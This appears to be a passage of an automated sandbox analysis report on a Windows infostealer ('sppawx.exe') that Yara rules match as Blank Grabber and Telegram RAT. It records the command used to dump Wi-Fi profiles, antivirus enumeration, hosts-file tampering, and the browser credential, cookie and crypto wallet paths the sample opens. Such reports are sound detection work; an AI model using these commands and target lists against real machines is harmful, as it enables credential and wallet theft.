Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\sppawx.exe

Code function: 0_2_00007FF79A31D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF79A31D080

Source: C:\Users\user\Desktop\sppawx.exe

Code function: 0_2_00007FF79A335C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF79A335C70

Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe

Code function: 103_2_00007FF6256F48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

103_2_00007FF6256F48CC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Desktop\sppawx.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.1299449724.00000213D8524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1299449724.00000213D8522000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1739009557.0000018C01A4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sppawx.exe PID: 7808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sppawx.exe PID: 7860, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI78082\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: sppawx.exe PID: 7860, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: LfJaxx
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\c6rta27r.default	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\d5610d20-4a84-40b4-96b3-9660f248e6a5	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match

File source: Process Memory Space: sppawx.exe PID: 7860, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.1299449724.00000213D8524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1299449724.00000213D8522000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1739009557.0000018C01A4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sppawx.exe PID: 7808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sppawx.exe PID: 7860, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI78082\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

